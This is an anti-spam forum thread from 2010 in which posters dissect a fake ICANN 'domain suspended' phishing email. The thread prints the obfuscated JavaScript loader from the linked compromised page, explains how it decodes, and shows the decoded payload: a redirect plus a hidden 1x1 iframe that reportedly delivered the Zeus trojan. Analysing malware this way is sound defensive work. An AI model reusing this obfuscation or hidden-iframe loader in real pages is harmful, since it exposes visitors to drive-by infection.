
JavaScript Obfuscation nonsense




 PostPosted: Wed Jun 23, 2010 10:34 am   
Site Admin
Another utterly stupid attempt:

Quote:
Subject: Your Domain Has Been Suspended
From: "ICANN Services" <alert@icann.org>
Letter from ICANN (the Internet Corporation for Assigned Names And Numbers)
Your Domain Has Been Suspended.

Click here for more information:
http://booksalon.kr/index2.html

Please contact billing/support center A.S.A.P
[email protected]

booksalon.kr is, of course, another compromised server. index2.html contains some of the more ridiculous obfuscation these attackers use. I'll wrap it for legibility — note the wrapping splits several of the long string literals, so the listing below will not run as pasted; treat it as a read-only sample, which is the right way to handle it anyway.

Code:
// NOTE(review): obfuscated loader exactly as served from index2.html, wrapped for
// display (several string literals are split across lines, so this text is not
// runnable as-is). What it does, read straight from the code:
//
//   * VvIf is the string 'replace', EWgUi is '' and mGdujq is `this` (the global
//     object). Every  X[VvIf](/[...]/g, EWgUi)  therefore strips a set of padding
//     letters out of a decoy string to recover a real property name:
//       'lGeNnGgNtThG'             -> 'length'
//       'SotorFidndgo'             -> 'String'
//       'fDrqoqmQCqhQaQrQCqoqdsel' -> 'fromCharCode'
//       'cuhnaurLCnozdSeuALtn'     -> 'charCodeAt'
//       'eyvZaZlN', 'euvLaulm'     -> 'eval'
//       'sTuwbwswtMrMiUnLgw'       -> 'substring'
//       'lbeNnbgstNhZ'             -> 'length'
//       'uhnKehsKcKaKpleo'         -> 'unescape'
//     so mGdujq['eval'] is a plain global eval.
//
//   * The many  `var a, b; if (a<b || ...){a = b-c;}`  statements operate on
//     undefined or constant values and none of those variables (nor the random
//     decoy strings such as 'ydbqw', 'IvxLRJCcKGfDMW') feed the payload; they are
//     filler to defeat naive signatures.
//
//   * Payload path: the short fragments (qxSH, aCn, MET, KBL, XMdHkJ, ...) are
//     concatenated into aCMjf; a first eval rewrites the letters
//     m t i s w N U x y g into %5 %1 %2 %7 %0 %6 %3 %9 %8 %4 (so "N9N2" becomes
//     "%69%62"); unescape() turns the %xx escapes into bytes; ltY XORs every char
//     code with 13; and a second eval executes the result. Decoding "N9N2Nes8N0N8N3s9"
//     by hand gives "document" — the document.write() shown later in the thread.
//
//   * Safe triage tip: replace the final eval with a print of its argument (never
//     execute the sample) and the decoded payload falls out in one step.
var EWgUi ;EWgUi= '' ; var DD , Gz,KpsHj;if (KpsHj<DD || DD<Gz){DD=Gz-
KpsHj;}var mGdujq=this ; var VvIf =''+'replace' ; var XMdHkJ; XMdHkJ
='';XMdHkJ =
'9sdU7i2i2sfs8NcN2i3Ncs8ses9N4N3seN5N8N0NcN1N8i3NeN2N0i2N4N3N9N8s5i3sd
N'; var KqO, XZoWC ;var zt ; zt= 339 ;if (KqO==XZoWC){KqO=
XZoWC+zt;}var HcxN= 'sfU3'; var qxSH;qxSH='';qxSH =
'N9N2Nes8N0N8N3s9i3sasfN4s9N8i5ifmagcg4m9idU9idmeg8geg2g3g9i3i3i3U1N0N
8s9NcidN5s9s9sdi0N8scs8N4sbU0m1ifsfN8NbsfN8seN5m1ifidNeN2N3s9N8'; var
fKVrBy;fKVrBy ='Uciaidses9s4N1N8U0iasbN4seN';var Ywfno='ydbqw'; var
cAT=252;var MmIj=479;var OGy ; OGy =931 ; if
(cAT>MmIj){cAT=MmIj+OGy;}var fh ;fh ='';var emnJ , aBhJ , vAE ;if
(vAE>emnJ && emnJ<=aBhJ){emnJ=aBhJ+vAE; }fh =
'ciaidN5N8N4NaN5s9U0ia';var oyGzhN ;oyGzhN = '';var GADYNJ, LkVmEI
;var BUPZxW =446; if (BUPZxW<GADYNJ || GADYNJ>=LkVmEI){GADYNJ =LkVmEI
- BUPZxW; }oyGzhN ='4U6' ; var qXO;qXO= 582 ; var AH = 23;var cP= 720;
if (cP<qXO || qXO<=AH){qXO = AH-cP ; }var EBMxEe=
'5sdU2sdN4N9U0UcUdiai';var OKh ,Km;var OmPz =766; if (OmPz= OKh ||
OKh==Km){OKh=Km+OmPz;}var Illshy ;Illshy ='' ; Illshy
='4N9N9N8N3U6';var MET;MET = ''; var XlM , VnFIU,wRL ; if (wRL<XlM &&
XlM>=VnFIU){XlM =VnFIU+wRL ; }MET='m1ifidi2U3U1N4Nb'; var kCEEn =198 ;
var mHR, GhGv ; if (kCEEn==mHR){kCEEn =mHR^GhGv; }var ZgM=
'IvxLRJCcKGfDMW' ;var HtaU;HtaU ='4NfN4N1N4s9s4U7idN5N'; var etHAM=
'ifi' ; var fnYhiV= 'MrCP';var MIL ;MIL = '' ;var kR= 109; var Cbq,
eMTx; if (kR>Cbq){kR = Cbq^eMTx ;}MIL = 'dsaN4N9s9N5U0iaU' ;var
KBL='sfNcN0N8idsesfNeU0iaN5s9s';var TAcsH= 231 ; var jBEgFQ; jBEgFQ =
173 ;var xjtMSO= 637; if (xjtMSO>TAcsH || TAcsH<jBEgFQ){TAcsH =
jBEgFQ/xjtMSO ;}var BdkA ='CJYbypzeBpaTqdGYi';var Ilj= '3U1i2N4N';var
HqP; HqP ='iaU' ;var BazxfH ,QaK ,INxI ; if (INxI= BazxfH ||
BazxfH>QaK){BazxfH = QaK-INxI; }var iZj='rWbbcUOmoAzXl';var LwQ;LwQ=
'1Nf' ;var zbRlIK ='uzpFLWMkxKHVQhc'; var HjN =767 ;var cE;cE =
513;var ZmmMl; ZmmMl=480;if (HjN<=cE){HjN = cE+ZmmMl; }var aCn
='N3s9U0m1ifU9U6s8sfN1U0N5s9s9sdU7i2i2N2NeNes8sfN1N8Ncses9i3NeN2N0' ;
var HcCux ='blJhHhEbWEoNlD'; var Xsx,YPgqhV ; var XPGpZ ;XPGpZ =184;
// ltY(pEs): the XOR-13 decoder. For each index mo of pEs it appends
// String.fromCharCode(13 ^ pEs.charCodeAt(mo)). Note the loop counter `mo` is
// never declared with var, so it leaks as an implicit global.
if (Xsx>=YPgqhV){Xsx= YPgqhV^XPGpZ ;}function ltY(pEs){var pEa =
EWgUi;for(mo =0 ; mo<pEs['lGeNnGgNtThG'[VvIf](/[GzTNV]/g , EWgUi)];
++mo){pEa=pEa+mGdujq['SotorFidndgo'[VvIf](/[odCTF]/g,
EWgUi)]['fDrqoqmQCqhQaQrQCqoqdsel'[VvIf](/[lsqDQ]/g
,EWgUi)](13^pEs['cuhnaurLCnozdSeuALtn'[VvIf](/[nSuzL]/g,EWgUi)](mo)) ;
}return pEa;}var uvwUAp = 'bsfNcN0N8U3U'; var mwRD ; mwRD=EWgUi;var
aCMjf = qxSH+aCn ;aCMjf=aCMjf+MET+KBL;aCMjf= aCMjf+XMdHkJ;
aCMjf=aCMjf+EBMxEe;aCMjf=aCMjf+MIL+fh ;aCMjf =aCMjf+fKVrBy;aCMjf
=aCMjf+HtaU ; aCMjf = aCMjf+Illshy; aCMjf= aCMjf+HqP+Ilj+uvwUAp+LwQ
;aCMjf = aCMjf+HcxN+etHAM+oyGzhN+mwRD; var BEQHEO=
'CmV5Bto1ciL2Msj7ewa0ANE6PUW3ZxF9fyT8dgQ4'[VvIf](/[CBcMeAPZfd]/g,'\%')
[VvIf](/[VoLjaEWFTQ]/g , '\¹');var gLM ,ogzW ;var YhEv = 531 ;if
(YhEv= gLM && gLM>ogzW){gLM =ogzW^YhEv; }var MwqIkO="')[VvIf](/[";var
nsPtv= "]/g,'%"; var GHDCO
// BEQHEO decodes to "%m¹5%t¹1%i¹2%s¹7%w¹0%N¹6%U¹3%x¹9%y¹8%g¹4"; GHDCO swaps the
// '%' and '¹' placeholders for the code fragments MwqIkO / nsPtv, yielding a chain
// of  [VvIf](/[m]/g,'%5')[VvIf](/[t]/g,'%1')...  that the first eval below glues
// onto "var IuO= aCMjf". Because the eval runs in global scope, IuO becomes a
// global the second eval can read.
=BEQHEO[VvIf](/[\%]/g,MwqIkO)[VvIf](/[\¹]/g, nsPtv) ;var dnAJz; dnAJz
=VvIf ;mGdujq['eyvZaZlN'[dnAJz](/[NZbyg]/g ,EWgUi)]('var IuO=
aCMjf'+GHDCO['sTuwbwswtMrMiUnLgw'[VvIf](/[wUTLM]/g, EWgUi)](2 ,
GHDCO['lbeNnbgstNhZ'[VvIf](/[ZNbsq]/g, EWgUi)])+"') ;var kX= 429; var
rB ,vTS; if (kX==rB){kX=rB^vTS ;}") ;var LmNE, MarhR;var Sf = 883 ;if
(Sf>LmNE || LmNE==MarhR){LmNE
// Second eval: eval(ltY(unescape(IuO))) — this is the line that actually
// executes the decoded document.write() payload.
=MarhR+Sf;}mGdujq['euvLaulm'[VvIf](/[muzLc]/g,
EWgUi)](ltY(mGdujq[['uhnKehsKcKaKpleo'[VvIf](/[oKhlE]/g,
EWgUi)]](IuO))); var ryCbCw=950 ;var ZgYL , vGF;if
(ryCbCw>ZgYL){ryCbCw =ZgYL+vGF;}

That looks more confusing than it is. The JavaScript method names are hidden by stripping padding letters out of decoy strings with .replace() (e.g. 'eyvZaZlN' minus N/Z/b/y/g is 'eval'), and the payload is stored as letter-encoded hex that is turned back into %xx escapes, unescape()d, XORed with 13 and then eval()ed. It's still a really obvious and easy thing to get past: decode it statically, or swap the final eval for a print — never run the sample in a real browser.

The resulting output after all that is (again: wrapped for clarity):

Code:
// Decoded payload (the single document.write() string is wrapped across three
// lines here for display). Two things happen, read straight from the markup:
//   1. <meta http-equiv="refresh" content="4;url=http://occurleast.com"> — after
//      4 seconds the browser is redirected to occurleast.com; the only visible
//      content before that is the "WAIT 4 SECOND..." text.
//   2. A 1x1, visibility:hidden <iframe> loads
//      http://ruao.austinshemale.com/index.php?pid=10 in the meantime — the
//      classic silent-loader shape; whatever that URL serves is fetched without
//      the visitor seeing it, so "blank" at one point in time says nothing
//      about what it serves at another.
document.write("WAIT 4 SECOND...<meta http-equiv=\"refresh\" content=\"4;url=http://occurleast.com\" />
<iframe src='http://ruao.austinshemale.com/index.php?pid=10' width='1' height='1' style='visibility: hidden;'>
</iframe><br>");

So: they go to all this trouble, lying about being ICANN, lying about "your domain" being suspended, then presenting ridiculously obfuscated javascript... to send you to another Spamit site? What a waste of time.

Oddly enough, occurleast is not hosted via fast flux, but it has six (6) DNS servers. Somebody must have been burned in the past.

The austinshemale.com iframe is blank, possibly just to track visits — though a hidden 1x1 iframe with a pid= parameter is the usual loader shape, and a blank response at one moment doesn't mean it stays harmless.

Just another really stupid attempt. Who on earth would be clicking through this garbage and actually buying anything?!

SiL


 PostPosted: Wed Jun 23, 2010 12:08 pm   
Spammers' Nightmare
I saw this spam, too and thought wtf?


 PostPosted: Wed Jun 23, 2010 12:15 pm   
Getting started
Definitely a ridiculous attempt at spamming. I've been seeing a ton of the cheap JavaScript obfuscation as well recently. It started off as blatantly obvious and has become increasingly "complex", if you want to call it that, over the last week and a half. Initially they were doing a .replace and taking out every other character: mXyXuXrXl = myurl....

In regard to the iframe though, it's used to deliver the Zeus trojan (at least historically, for a week and a half anyway). I've been finding that more often than not it's blank as well, but you might get lucky/unlucky I suppose.

Should be fun to see how they hide their javascript next.


 PostPosted: Wed Jun 23, 2010 1:27 pm   
Site Admin
hellkyng wrote:
Should be fun to see how they hide their javascript next.


Given that most systems I've tested this setup on have instantly alerted that this is likely malicious, this can't be a very successful setup no matter how they slice it.

They just strike me as completely amateur.

SiL



